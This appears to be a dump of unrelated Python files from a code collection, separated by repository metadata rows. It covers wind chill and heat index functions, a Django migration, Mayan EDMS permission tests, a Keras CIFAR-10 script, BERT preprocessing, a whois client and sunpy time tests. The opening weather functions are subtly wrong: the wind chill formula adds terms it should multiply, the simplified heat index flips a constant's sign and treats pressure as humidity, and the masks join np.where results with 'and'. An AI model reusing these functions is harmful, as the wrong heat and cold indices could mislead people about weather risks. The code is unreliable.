def calculate_wind_chill(t2m, va):
"""
Wind Chill
:param t2m: 2m Temperature [K]
:param va: wind speed at 10 meters [m/s]
returns wind chill [°C]
"""
t2m = __wrap(t2m)
va = __wrap(va)
t2m = kelvin_to_celsius(t2m)
va = va * 2.23694 # convert to miles per hour
windchill = 13.12 + 0.6215 * t2m - 11.37 * va ** 0.16 + 0.3965 + t2m + va ** 0.16
return windchill
def calculate_heat_index_simplified(t2m, rh=None):
"""
Heat Index
:param t2m: np.array 2m temperature [K]
:param rh: Relative Humidity [pa]
returns heat index [°C]
"""
t2m = __wrap(t2m)
if rh is None:
rh = calculate_saturation_vapour_pressure(t2m)
t2m = kelvin_to_celsius(t2m)
rh = kPa_to_hPa(rh)
hiarray = [
-8.784695,
1.61139411,
2.338549,
0.14611605,
1.2308094e-2,
2.211732e-3,
7.2546e-4,
3.58e-6,
]
hi = (
-hiarray[0]
+ hiarray[1] * t2m
+ hiarray[2] * rh
- hiarray[3] * t2m * rh
- hiarray[4] * rh ** 2
+ hiarray[5] * t2m ** 2 * rh
+ hiarray[6] * t2m * rh ** 2
- hiarray[7] * t2m ** 2 * rh ** 2
)
return hi
def calculate_heat_index_adjusted(t2m, td):
"""
Heat Index adjusted
:param t2m: np.array 2m temperature [K]
:param td: np.array 2m dewpoint temperature [K]
returns heat index [°C]
"""
t2m = __wrap(t2m)
td = __wrap(td)
rh = calculate_relative_humidity_percent(t2m, td)
t2m = kelvin_to_fahrenheit(t2m)
hiarray = [
42.379,
2.04901523,
10.1433312,
0.22475541,
0.00683783,
0.05481717,
0.00122874,
0.00085282,
0.00000199,
]
hi = (
-hiarray[0]
+ hiarray[1] * t2m
+ hiarray[2] * rh
- hiarray[3] * t2m * rh
- hiarray[4] * t2m ** 2
- hiarray[5] * rh ** 2
+ hiarray[6] * t2m ** 2 * rh
+ hiarray[7] * t2m * rh ** 2
- hiarray[8] * t2m ** 2 * rh ** 2
)
hi_filter1 = np.where(t2m > 80)
hi_filter2 = np.where(t2m < 112)
hi_filter3 = np.where(rh <= 13)
hi_filter4 = np.where(t2m < 87)
hi_filter5 = np.where(rh > 85)
hi_filter6 = np.where(t2m < 80)
adjustment1 = (
(13 - rh[hi_filter1 and hi_filter2 and hi_filter3])
/ 4
* np.sqrt(
17 - np.abs(t2m[hi_filter1 and hi_filter2 and hi_filter3] - 0.95) / 17
)
)
adjustment2 = (rh[hi_filter1 and hi_filter4 and hi_filter5] - 85) * (
(87 - t2m[hi_filter1 and hi_filter4 and hi_filter5]) / 5
)
adjustment3 = 0.5 * (
t2m[hi_filter6]
+ 61.0
+ ((t2m[hi_filter6] - 68.0) * 1.2)
+ (rh[hi_filter6] * 0.094)
)
hi[hi_filter1 and hi_filter2 and hi_filter3] = (
hi[hi_filter1 and hi_filter2 and hi_filter3] - adjustment1
)
hi[hi_filter1 and hi_filter4 and hi_filter5] = (
hi[hi_filter1 and hi_filter4 and hi_filter5] - adjustment2
)
hi[hi_filter6] = adjustment3
hi = fahrenheit_to_celsius(hi)
return hi
# Helpers
# convert Celsius to Kelvin
def celsius_to_kelvin(tc):
tk = tc + 273.15
return tk
# convert Kelvin to Celsius
def kelvin_to_celsius(tk):
tc = tk - 273.15
return tc
| 30.984946
| 111
| 0.549591
|
4a0a3ddec54f924d442d2226a7676fff4d8c3a5e
| 3,019
|
py
|
Python
|
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | 1
|
2019-04-20T07:54:21.000Z
|
2019-04-20T07:54:21.000Z
|
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | null | null | null |
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-12-25 15:00
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('mobile', models.CharField(max_length=30, verbose_name='用户手机号')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'users',
'db_table': 'tb_user',
'verbose_name': 'user',
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| 62.895833
| 329
| 0.662471
|
4a0a3fed7ab0bd697149e886caf8fac5f9bd1ea2
| 16,591
|
py
|
Python
|
mayan/apps/documents/tests/test_document_views.py
|
O2Graphics/Mayan-EDMS
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/documents/tests/test_document_views.py
|
O2Graphics/Mayan-EDMS
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
[
"Apache-2.0"
] | 5
|
2021-03-19T22:56:45.000Z
|
2022-03-12T00:08:43.000Z
|
mayan/apps/documents/tests/test_document_views.py
|
halsten/mayan-edms
|
10372daede6e6dea0bea67eb98767e3be6fbf86f
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from django.utils.encoding import force_text
from mayan.apps.converter.layers import layer_saved_transformations
from mayan.apps.converter.permissions import permission_transformation_delete
from mayan.apps.converter.tests.mixins import LayerTestMixin
from ..models import DeletedDocument, Document, DocumentType
from ..permissions import (
permission_document_create, permission_document_download,
permission_document_print, permission_document_properties_edit,
permission_document_tools, permission_document_view,
permission_empty_trash
)
from .base import GenericDocumentViewTestCase
from .literals import (
TEST_DOCUMENT_TYPE_2_LABEL, TEST_SMALL_DOCUMENT_FILENAME
)
from .mixins import DocumentViewTestMixin
class DocumentViewTestCase(
LayerTestMixin, DocumentViewTestMixin, GenericDocumentViewTestCase
):
def test_document_view_no_permissions(self):
response = self._request_document_properties_view()
self.assertEqual(response.status_code, 404)
def test_document_view_with_permissions(self):
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_properties_view()
self.assertContains(
response=response, text=self.test_document.label, status_code=200
)
def test_document_list_view_no_permissions(self):
response = self._request_test_document_list_view()
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['object_list'].count(), 0)
def test_document_list_view_with_access(self):
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_test_document_list_view()
self.assertContains(
response=response, text=self.test_document.label, status_code=200
)
def test_document_document_type_change_post_view_no_permissions(self):
self.assertEqual(
self.test_document.document_type, self.test_document_type
)
document_type_2 = DocumentType.objects.create(
label=TEST_DOCUMENT_TYPE_2_LABEL
)
response = self._request_test_document_type_edit_post_view(
document_type=document_type_2
)
self.assertEqual(response.status_code, 404)
self.assertEqual(
Document.objects.get(pk=self.test_document.pk).document_type,
self.test_document_type
)
def test_document_document_type_change_post_view_with_permissions(self):
self.assertEqual(
self.test_document.document_type, self.test_document_type
)
document_type_2 = DocumentType.objects.create(
label=TEST_DOCUMENT_TYPE_2_LABEL
)
self.grant_access(
obj=self.test_document, permission=permission_document_properties_edit
)
self.grant_access(
obj=document_type_2, permission=permission_document_create
)
response = self._request_test_document_type_edit_post_view(
document_type=document_type_2
)
self.assertEqual(response.status_code, 302)
self.assertEqual(
Document.objects.get(pk=self.test_document.pk).document_type,
document_type_2
)
def test_document_document_type_change_view_get_no_permissions(self):
response = self._request_test_document_type_edit_get_view(
)
self.assertEqual(response.status_code, 404)
self.assertEqual(
Document.objects.get(pk=self.test_document.pk).document_type,
self.test_document_type
)
def test_document_document_type_change_view_get_with_permissions(self):
self.grant_access(
obj=self.test_document, permission=permission_document_properties_edit
)
response = self._request_test_document_type_edit_get_view(
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
Document.objects.get(pk=self.test_document.pk).document_type,
self.test_document_type
)
def test_document_multiple_document_type_change_view_no_permission(self):
self.assertEqual(
Document.objects.first().document_type, self.test_document_type
)
document_type_2 = DocumentType.objects.create(
label=TEST_DOCUMENT_TYPE_2_LABEL
)
response = self._request_multiple_document_type_edit(
document_type=document_type_2
)
self.assertEqual(response.status_code, 404)
self.assertEqual(
Document.objects.first().document_type, self.test_document_type
)
def test_document_multiple_document_type_change_view_with_permission(self):
self.assertEqual(
Document.objects.first().document_type, self.test_document_type
)
document_type_2 = DocumentType.objects.create(
label=TEST_DOCUMENT_TYPE_2_LABEL
)
self.grant_access(
obj=self.test_document,
permission=permission_document_properties_edit
)
self.grant_access(
obj=document_type_2, permission=permission_document_create
)
response = self._request_multiple_document_type_edit(
document_type=document_type_2
)
self.assertEqual(response.status_code, 302)
self.assertEqual(
Document.objects.first().document_type, document_type_2
)
def test_document_download_form_view_no_permission(self):
response = self._request_document_download_form_view()
self.assertNotContains(
response=response, text=self.test_document.label, status_code=200
)
def test_document_download_form_view_with_access(self):
self.grant_access(
obj=self.test_document, permission=permission_document_download
)
response = self._request_document_download_form_view()
self.assertContains(
response=response, text=self.test_document.label, status_code=200
)
def test_document_download_view_no_permission(self):
response = self._request_document_download_view()
self.assertEqual(response.status_code, 403)
def test_document_download_view_with_permission(self):
# Set the expected_content_types for
# common.tests.mixins.ContentTypeCheckMixin
self.expected_content_types = (
'{}; charset=utf-8'.format(
self.test_document.file_mimetype
),
)
self.grant_access(
obj=self.test_document, permission=permission_document_download
)
response = self._request_document_download_view()
self.assertEqual(response.status_code, 200)
with self.test_document.open() as file_object:
self.assert_download_response(
response=response, content=file_object.read(),
basename=TEST_SMALL_DOCUMENT_FILENAME,
mime_type=self.test_document.file_mimetype
)
def test_document_multiple_download_view_no_permission(self):
response = self._request_document_multiple_download_view()
self.assertEqual(response.status_code, 403)
def test_document_multiple_download_view_with_permission(self):
# Set the expected_content_types for
# common.tests.mixins.ContentTypeCheckMixin
self.expected_content_types = (
'{}; charset=utf-8'.format(
self.test_document.file_mimetype
),
)
self.grant_access(
obj=self.test_document, permission=permission_document_download
)
response = self._request_document_multiple_download_view()
self.assertEqual(response.status_code, 200)
with self.test_document.open() as file_object:
self.assert_download_response(
response=response, content=file_object.read(),
basename=TEST_SMALL_DOCUMENT_FILENAME,
mime_type=self.test_document.file_mimetype
)
def test_document_version_download_view_no_permission(self):
response = self._request_document_version_download()
self.assertEqual(response.status_code, 403)
def test_document_version_download_view_with_permission(self):
# Set the expected_content_types for
# common.tests.mixins.ContentTypeCheckMixin
self.expected_content_types = (
'{}; charset=utf-8'.format(
self.test_document.latest_version.mimetype
),
)
self.grant_access(
obj=self.test_document, permission=permission_document_download
)
response = self._request_document_version_download()
self.assertEqual(response.status_code, 200)
with self.test_document.open() as file_object:
self.assert_download_response(
response=response, content=file_object.read(),
basename=force_text(self.test_document.latest_version),
mime_type='{}; charset=utf-8'.format(
self.test_document.latest_version.mimetype
)
)
def test_document_version_download_preserve_extension_view_with_permission(self):
# Set the expected_content_types for
# common.tests.mixins.ContentTypeCheckMixin
self.expected_content_types = (
'{}; charset=utf-8'.format(
self.test_document.latest_version.mimetype
),
)
self.grant_access(
obj=self.test_document, permission=permission_document_download
)
response = self._request_document_version_download(
data={'preserve_extension': True}
)
self.assertEqual(response.status_code, 200)
with self.test_document.open() as file_object:
self.assert_download_response(
response=response, content=file_object.read(),
basename=self.test_document.latest_version.get_rendered_string(
preserve_extension=True
), mime_type='{}; charset=utf-8'.format(
self.test_document.latest_version.mimetype
)
)
def test_document_update_page_count_view_no_permission(self):
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
response = self._request_document_update_page_count_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(self.test_document.pages.count(), 0)
def test_document_update_page_count_view_with_permission(self):
page_count = self.test_document.pages.count()
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
self.grant_access(
obj=self.test_document, permission=permission_document_tools
)
response = self._request_document_update_page_count_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(self.test_document.pages.count(), page_count)
def test_document_multiple_update_page_count_view_no_permission(self):
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
response = self._request_document_multiple_update_page_count_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(self.test_document.pages.count(), 0)
def test_document_multiple_update_page_count_view_with_permission(self):
page_count = self.test_document.pages.count()
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
self.grant_access(
obj=self.test_document, permission=permission_document_tools
)
response = self._request_document_multiple_update_page_count_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(self.test_document.pages.count(), page_count)
def test_document_clear_transformations_view_no_permission(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_clear_transformations_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
transformation_count,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_clear_transformations_view_with_access(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document,
permission=permission_transformation_delete
)
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_clear_transformations_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(
transformation_count - 1,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_multiple_clear_transformations_view_no_permission(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_multiple_clear_transformations()
self.assertEqual(response.status_code, 404)
self.assertEqual(
transformation_count,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_multiple_clear_transformations_view_with_access(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
self.grant_access(
obj=self.test_document, permission=permission_transformation_delete
)
response = self._request_document_multiple_clear_transformations()
self.assertEqual(response.status_code, 302)
self.assertEqual(
transformation_count - 1,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_trash_can_empty_view_no_permission(self):
self.test_document.delete()
self.assertEqual(DeletedDocument.objects.count(), 1)
response = self._request_empty_trash_view()
self.assertEqual(response.status_code, 403)
self.assertEqual(DeletedDocument.objects.count(), 1)
def test_trash_can_empty_view_with_permission(self):
self.test_document.delete()
self.assertEqual(DeletedDocument.objects.count(), 1)
self.grant_permission(permission=permission_empty_trash)
response = self._request_empty_trash_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(DeletedDocument.objects.count(), 0)
self.assertEqual(Document.objects.count(), 0)
def test_document_print_view_no_access(self):
response = self._request_document_print_view()
self.assertEqual(response.status_code, 403)
def test_document_print_view_with_access(self):
self.grant_access(
obj=self.test_document, permission=permission_document_print
)
response = self._request_document_print_view()
self.assertEqual(response.status_code, 200)
| 35.911255
| 85
| 0.689048
|
4a0a4028a4694621f15495493c1f99fc67a7abfe
| 4,861
|
py
|
Python
|
TensorFlow+Keras/cifar10/cifar10.py
|
16647615268/python
|
933644a49dfac2c614e243e3db378441cb6a6dd7
|
[
"Apache-2.0"
] | 3
|
2019-10-05T07:26:53.000Z
|
2019-10-10T08:08:17.000Z
|
TensorFlow+Keras/cifar10/cifar10.py
|
yangli-os/python
|
ddf5636fb522c0b28f93866f0f65a38fa007a79b
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow+Keras/cifar10/cifar10.py
|
yangli-os/python
|
ddf5636fb522c0b28f93866f0f65a38fa007a79b
|
[
"Apache-2.0"
] | 2
|
2020-06-18T09:54:02.000Z
|
2021-01-24T03:48:19.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 4 14:38:23 2018
@author: liyang
"""
from keras.datasets import cifar10
from keras.utils import np_utils #后续将label标签转换成One-Hot Encoding
import numpy as np
np.random.seed(10)
(x_train_image,y_train_label),\
(x_test_image,y_test_label)=cifar10.load_data()
#print('train:',len(x_train_image))
#print('test:',len(x_test_image))
#print(x_train_image.shape)
x_Train=x_train_image.astype('float32') #28*28转换为一维向量784,float方便标准化
x_Test=x_test_image.astype('float32')
x_Train_normalize=x_Train/255.0 #数据标准化,images数字化后的数字为0~255
x_Test_narmalize=x_Test/255.0
y_Train_OneHot=np_utils.to_categorical(y_train_label)
y_Test_OneHot=np_utils.to_categorical(y_test_label)
#建立神经网络模型
from keras.models import Sequential
from keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D,Activation,ZeroPadding2D
model=Sequential() #建立神经网络的蛋糕架
#建立卷积层,filters滤镜个数,kernel_size滤镜大小,padding卷积图像大小不变,输入维数彩色为3
model.add(Conv2D(filters=32,kernel_size=(3,3),padding='same',
input_shape=(32,32,3),activation='relu'))
#建立池化层,以2*2矩阵转为单值缩小图片,也就是缩减为原来的一半
model.add(Dropout(0.3)) #添加Dropout层,避免过拟合,设置去取消权值的神经元比例
model.add(Conv2D(filters=32,kernel_size=(3,3),padding='same',activation='relu'))
#建立池化层,以2*2矩阵转为单值缩小图片,也就是缩减为原来的一半
model.add(MaxPooling2D(pool_size=(2,2))) #添加池化层,缩减一半
#建立卷积层,filters滤镜个数,kernel_size滤镜大小,padding卷积图像大小不变,输入维数第三维是单色为1
model.add(Conv2D(filters=64,kernel_size=(3,3),padding='same',activation='relu'))
model.add(Dropout(0.3)) #添加Dropout层,避免过拟合,设置去取消权值的神经元比例
model.add(Conv2D(filters=64,kernel_size=(3,3),padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))#建立池化层,以2*2矩阵转为单值缩小图片,也就是缩减为原来的一半
model.add(Conv2D(filters=128,kernel_size=(3,3),padding='same',activation='relu'))
model.add(Dropout(0.3)) #添加Dropout层,避免过拟合,设置去取消权值的神经元比例
model.add(Conv2D(filters=128,kernel_size=(3,3),padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))#建立池化层,以2*2矩阵转为单值缩小图片,也就是缩减为原来的一半
model.add(Flatten()) #建立平坦层
model.add(Dropout(0.3)) #添加Dropout层,避免过拟合,设置去取消权值的神经元比例
model.add(Dense(1024,activation='relu')) #建立隐含层,设置神经元个数
model.add(Dropout(0.3)) #添加Dropout层,避免过拟合,设置去取消权值的神经元比例
model.add(Dense(10,activation='softmax'))#softmax将每一个神经元的输出转换为预测每一个数字的概率
#设置训练参数loss使用交叉熵,优化器adam,评估方式为准确率
model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
try:
model.load_weights("SaveModel/cifarCnnModel.h5")
print('模型加载成功,继续训练模型')
except:
print("加载模型失败,开始训练新模型")
train_history=model.fit(x=x_Train_normalize,y=y_Train_OneHot,
validation_split=0.2,epochs=10,batch_size=128,verbose=1)
#反向传播时validation_split验证数据的比例,训练次数,每一批次训练的项数verbose显示训练过程
#图形显示训练过程
import matplotlib.pyplot as plt
#显示训练过程loss和accuracy的函数,输入参数为train_history
def show_train_history(train_history,train,validation): #训练参数
plt.plot(train_history.history[train]) #训练数据的执行结果
plt.plot(train_history.history[validation]) #训练数据的测试结果
plt.title('Train History')
plt.ylabel(train) #y轴准确率
plt.xlabel('Epoch') #x轴训练次数
plt.legend(['train','validation'],loc='upper left') #图例'train','validation'显示在左上角
plt.show()
#调用函数显示训练准确率,acc为训练集准确率,val_acc为验证集准确率,无测试集
show_train_history(train_history,'acc','val_acc')
show_train_history(train_history,'loss','val_loss')#调用函数显示训练误差
prediction=model.predict_classes(x_Test_narmalize) #使用测试数据进行预测
model.save_weights("SaveModel/cifarCnnModel.h5")
print("Saved model to disk")
#显示测试集中的图
label_dict={0:"airplane",1:"automobile",2:"bird",3:"cat",4:"deer",
5:"dog",6:"frog",7:"horse",8:"ship",9:"truck"}
def plot_images_labels_prediction(images,labels,prediction,idx,num):#查看多项训练数据
fig=plt.gcf() #设置要显示图像的大小
fig.set_size_inches(12,14)
if num>25: #显示的图片张数尽量不超过25
num=25
for i in range(0,num):
ax=plt.subplot(5,5,1+i) #每行显示5张图片
ax.imshow(images[idx],cmap='binary') #cmap为binary显示黑白灰度图像
title=str(i)+','+label_dict[labels[i][0]] #设置标题为label的标签
if len(prediction)>0: #如果是预测图,则显示预测的标签predict
title+='=>'+label_dict[prediction[i]]
ax.set_title(title,fontsize=10) #设置子图的标题
ax.set_xticks([]);ax.set_yticks([]) #设置不显示刻度
idx+=1 #读取下一项
plt.show()
#传入预测结果函数的参数,显示测试集中预测的前10个结果
plot_images_labels_prediction(x_test_image,y_test_label,prediction,idx=0,num=10)
##使用混淆矩阵显示预测结果
#import pandas as pd
##crosstab建立混淆矩阵,设置行列名
#print(pd.crosstab(y_test_label,prediction,rownames=['label'],colnames=['prediction']))
scores=model.evaluate(x_Test_narmalize,y_Test_OneHot,verbose=0)#显示预测模型的准确率,不更新日志
print('accuracy=',scores[1])
| 45.429907
| 91
| 0.716931
|
4a0a41035ec97783246632758208dc6504143b41
| 2,471
|
py
|
Python
|
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
next_sentence/processing.py
|
gdyp/bert-awesome
|
f0836aadaa23e95b82449570a39768bfe24bdadd
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding: utf-8 -*-
import csv
import torch
import pickle
from tqdm import tqdm
from utils.utils import tokenizer
from config import BERT_PRETRAINED_PATH
from inputters import InputExample, InputFeatures
MAX_LENGTH = 30
tokenizer = tokenizer()
number_map = {
'0': 1,
'1': 0
}
def read_file(path):
"""csv file"""
file = open(path)
reader = csv.reader(file)
next(reader) # filter header
for line in reader:
line[2] = number_map[line[2]]
yield line
def create_examples(data):
examples = []
for i, line in enumerate(data):
examples.append(InputExample(guid=i, text_a=line[0],
text_b=line[1], labels=line[2]))
return examples
def convert_example_to_features(examples):
features = []
for line in tqdm(examples, total=len(examples), desc='create examples'):
token_a = tokenizer.tokenize(line.text_a)
token_b = tokenizer.tokenize(line.text_b)
token_text = ['[CLS]']+token_a+['[SEP]']+token_b+['[SEP]']
tokens_ids = tokenizer.convert_tokens_to_ids(token_text)
segments_ids = [0]*(len(token_a)+2)+[1]*(len(token_b)+1)
input_mask = [1]*len(token_text)
assert len(segments_ids) == len(token_text)
assert len(input_mask) == len(token_text)
if len(token_text) > MAX_LENGTH:
continue
padding = [0]*(MAX_LENGTH-len(token_text))
tokens_ids += padding
segments_ids += padding
input_mask += padding
assert len(tokens_ids) == MAX_LENGTH
features.append(InputFeatures(input_ids=tokens_ids,
input_mask=input_mask,
segment_ids=segments_ids,
label_ids=int(line.labels)))
return features
def create_features(path):
file = read_file(path)
examples = create_examples(file)
return convert_example_to_features(examples)
# if __name__ == '__main__':
# file_path = '/home/gump/Software/pycharm-2018.1.6/' \
# 'projects/bert-for-classificaion/next_sentence/data/train.csv'
# file = read_file(file_path)
# examples = create_examples(file)
# feature = convert_example_to_features(examples)
#
# with open('val_features.pkl', 'wb') as f:
# pickle.dump(examples, f)
# # examples = pickle.load(f)
# # for i in range(10):
# # print('success')
| 26.287234
| 80
| 0.611493
|
4a0a420d471cf8d04c0663bcc0b176ca41ac94e4
| 562
|
py
|
Python
|
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
yawhois/client.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
This module provides a Client object to handle whois queries.
"""
from .server import Server
DEFAULT_TIMEOUT = 10
class Client(object):
def __init__(self, settings = {}):
if settings.has_key('timeout'):
self.timeout = settings.pop('timeout')
else:
self.timeout = DEFAULT_TIMEOUT
self.settings = settings
def lookup(self, domain):
server = Server.guess(domain)
server.configure(self.settings)
return server.lookup(domain)
| 21.615385
| 62
| 0.597865
|
4a0a429a794d41a8db85bc52007405a14c503169
| 28
|
py
|
Python
|
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | 1
|
2022-02-17T22:06:26.000Z
|
2022-02-17T22:06:26.000Z
|
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | null | null | null |
numpretty/__init__.py
|
obfuscatedgenerated/numpretty
|
d751cb967eab8f0009e4659347720d49b2771bf3
|
[
"MIT"
] | null | null | null |
from numpretty.main import *
| 28
| 28
| 0.821429
|
4a0a43cfc3ef8d0b09c1145196a380f063e26866
| 702
|
py
|
Python
|
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
py/common/design_patterns/Adapter.py
|
7134g/mySpiderAll
|
fc4cb986a5efa05977c7f569c69b60a4e6e861bf
|
[
"MIT"
] | null | null | null |
# 接口1
class S1:
def do_something(self, data):
return "".join(["S1", data])
# 接口2
class N1:
def do_something(self, data):
return "".join(["N1", data])
# 适配器
class Adapter:
def __init__(self, obj, adapted_methods):
self.obj = obj
self.__dict__.update(adapted_methods)
def __str__(self):
return str(self.obj)
def deal_msg():
# 生成实例
objects = {}
s = S1()
n = N1()
# 注册
objects["1"] = Adapter(s, dict(execute=s.do_something))
objects["2"] = Adapter(n, dict(execute=n.do_something))
return objects
if __name__ == '__main__':
config = "1"
data = "data"
s = deal_msg()[config].execute(data)
print(s)
| 19.5
| 59
| 0.579772
|
4a0a448b12411602f98974d07d79fdbc065d4052
| 11,796
|
py
|
Python
|
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
sunpy/time/tests/test_time.py
|
samaloney/sunpy
|
89142033a7a76bcd3b2791b779b8b43fac65a7f4
|
[
"BSD-2-Clause"
] | null | null | null |
from datetime import date, datetime
import numpy as np
import pandas
import pytest
import astropy.time
from astropy.time import Time
import sunpy.time as time
from sunpy.time import parse_time, is_time_equal
LANDING = Time('1966-02-03', format='isot')
def test_parse_time_24():
dt = parse_time("2010-10-10T24:00:00")
assert dt == Time('2010-10-11')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_24_2():
dt = parse_time("2010-10-10T24:00:00.000000")
assert dt == Time('2010-10-11')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_trailing_zeros():
# see issue #289 at https://github.com/sunpy/sunpy/issues/289
dt = parse_time('2010-10-10T00:00:00.00000000')
assert dt == Time('2010-10-10')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_tuple():
dt = parse_time((1966, 2, 3))
assert dt == LANDING
assert dt.format == 'isot'
assert dt.scale == 'utc'
dt = parse_time((1966, 2, 3, 12, 2, 3))
assert dt == Time('1966-2-3T12:2:3')
assert dt.format == 'isot'
assert dt.scale == 'utc'
dt = parse_time((1966, 2, 3, 12, 2, 3, 8266))
assert dt == Time('1966-2-3T12:2:3.008266')
assert dt.format == 'isot'
assert dt.scale == 'utc'
def test_parse_time_int():
# Once https://github.com/astropy/astropy/issues/6970 is fixed,
# remove .jd from equality check
dt1 = parse_time(765548612.0, format='utime')
assert dt1.jd == Time('2003-4-5T12:23:32').jd
assert dt1.format == 'utime'
dt2 = parse_time(1009685652.0, format='utime')
assert dt2.jd == Time('2010-12-30T4:14:12').jd
assert dt2.format == 'utime'
def test_parse_time_pandas_timestamp():
ts = pandas.Timestamp(LANDING.datetime)
